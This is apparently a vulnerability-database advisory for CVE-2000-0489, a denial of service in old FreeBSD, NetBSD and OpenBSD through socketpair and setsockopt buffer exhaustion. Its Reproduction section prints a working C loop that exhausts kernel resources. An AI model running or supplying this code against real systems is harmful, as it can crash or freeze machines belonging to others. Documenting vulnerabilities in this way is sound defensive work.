VYPR
← All advisories
Unrated severityNVD Advisory· Published Sep 5, 1999· Updated Apr 16, 2026

CVE-2000-0489

CVE-2000-0489

Description

FreeBSD, NetBSD, and OpenBSD are vulnerable to denial of service by exhausting system resources via socketpair and setsockopt.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

FreeBSD, NetBSD, and OpenBSD are vulnerable to denial of service by exhausting system resources via socketpair and setsockopt.

Vulnerability

A denial of service vulnerability exists in FreeBSD, NetBSD, and OpenBSD, potentially affecting all versions. The issue stems from the socketpair function and the setsockopt function when configuring socket buffer sizes. By creating numerous socket pairs and setting large buffer sizes, the system can be made to panic or stop responding [1].

Exploitation

An attacker can exploit this vulnerability by repeatedly creating socket pairs using the socketpair function, setting a large buffer size for both send and receive buffers using setsockopt, and then writing large buffers to these sockets. This process can be continued in a loop until system resources are exhausted [1].

Impact

Successful exploitation can lead to a denial of service. In FreeBSD, this may manifest as a system panic. In NetBSD and OpenBSD, network applications will stop responding, rendering the system unusable for network operations [1].

Mitigation

Details behind why this vulnerability occurs have not been made available, and no specific patched versions or workarounds have been disclosed in the available references. The vulnerability is believed to affect all versions of FreeBSD, NetBSD, and OpenBSD [1].

References
  1. FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - 'setsockopt()' Denial of Service

AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

23
  • FreeBSD/FreeBSD9 versions
    cpe:2.3:o:freebsd:freebsd:3.0:*:*:*:*:*:*:*+ 8 more
    • cpe:2.3:o:freebsd:freebsd:3.0:*:*:*:*:*:*:*
    • cpe:2.3:o:freebsd:freebsd:3.1:*:*:*:*:*:*:*
    • cpe:2.3:o:freebsd:freebsd:3.2:*:*:*:*:*:*:*
    • cpe:2.3:o:freebsd:freebsd:3.3:*:*:*:*:*:*:*
    • cpe:2.3:o:freebsd:freebsd:3.4:*:*:*:*:*:*:*
    • cpe:2.3:o:freebsd:freebsd:3.5:*:*:*:*:*:*:*
    • cpe:2.3:o:freebsd:freebsd:4.0:*:*:*:*:*:*:*
    • cpe:2.3:o:freebsd:freebsd:5.0:alpha:*:*:*:*:*:*
    • (no CPE)
  • NetBSD/NetBSD10 versions
    cpe:2.3:o:netbsd:netbsd:1.4.1:*:alpha:*:*:*:*:*+ 9 more
    • cpe:2.3:o:netbsd:netbsd:1.4.1:*:alpha:*:*:*:*:*
    • cpe:2.3:o:netbsd:netbsd:1.4.1:*:arm32:*:*:*:*:*
    • cpe:2.3:o:netbsd:netbsd:1.4.1:*:sparc:*:*:*:*:*
    • cpe:2.3:o:netbsd:netbsd:1.4.1:*:x86:*:*:*:*:*
    • cpe:2.3:o:netbsd:netbsd:1.4.2:*:alpha:*:*:*:*:*
    • cpe:2.3:o:netbsd:netbsd:1.4.2:*:arm32:*:*:*:*:*
    • cpe:2.3:o:netbsd:netbsd:1.4.2:*:sparc:*:*:*:*:*
    • cpe:2.3:o:netbsd:netbsd:1.4.2:*:x86:*:*:*:*:*
    • cpe:2.3:o:netbsd:netbsd:1.4:*:x86:*:*:*:*:*
    • (no CPE)
  • OpenBSD/OpenBSD4 versions
    cpe:2.3:o:openbsd:openbsd:2.5:*:*:*:*:*:*:*+ 3 more
    • cpe:2.3:o:openbsd:openbsd:2.5:*:*:*:*:*:*:*
    • cpe:2.3:o:openbsd:openbsd:2.6:*:*:*:*:*:*:*
    • cpe:2.3:o:openbsd:openbsd:2.7:*:*:*:*:*:*:*
    • (no CPE)

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The system mishandles large buffer sizes set via setsockopt when used with socket pairs, leading to resource exhaustion or crashes."

Attack vector

An attacker can exploit this vulnerability by creating a large number of socket pairs using the socketpair function. They then set a large buffer size for both send and receive buffers on these sockets using setsockopt. Finally, the attacker writes large buffers to these sockets, triggering the denial of service condition [ref_id=1]. This can cause network applications to stop responding or the system to panic [ref_id=1].

Affected code

The vulnerability is related to the use of the socketpair function in conjunction with setsockopt to configure SO_RCVBUF and SO_SNDBUF, followed by write operations. The provided exploit code demonstrates this by repeatedly calling socketpair, setting buffer sizes to BUFFERSIZE (204800), and then writing to the sockets [ref_id=1].

What the fix does

The advisory does not provide details on a specific patch or fix. It indicates that the vulnerability is related to setting socket options for buffer sizes and performing writes of corresponding sizes. Remediation guidance would typically involve validating buffer sizes passed to setsockopt or limiting the number of socket pairs that can be created to prevent resource exhaustion.

Preconditions

  • inputThe attacker must be able to execute code that calls socketpair, setsockopt with large buffer sizes, and performs write operations.
  • networkThe vulnerability affects FreeBSD, NetBSD, and OpenBSD operating systems [ref_id=1].

Reproduction

#include <unistd.h> #include <sys/socket.h> #include <fcntl.h>

#define BUFFERSIZE 204800

extern int main(void) { int p[2], i; char crap[BUFFERSIZE];

while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); }

Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.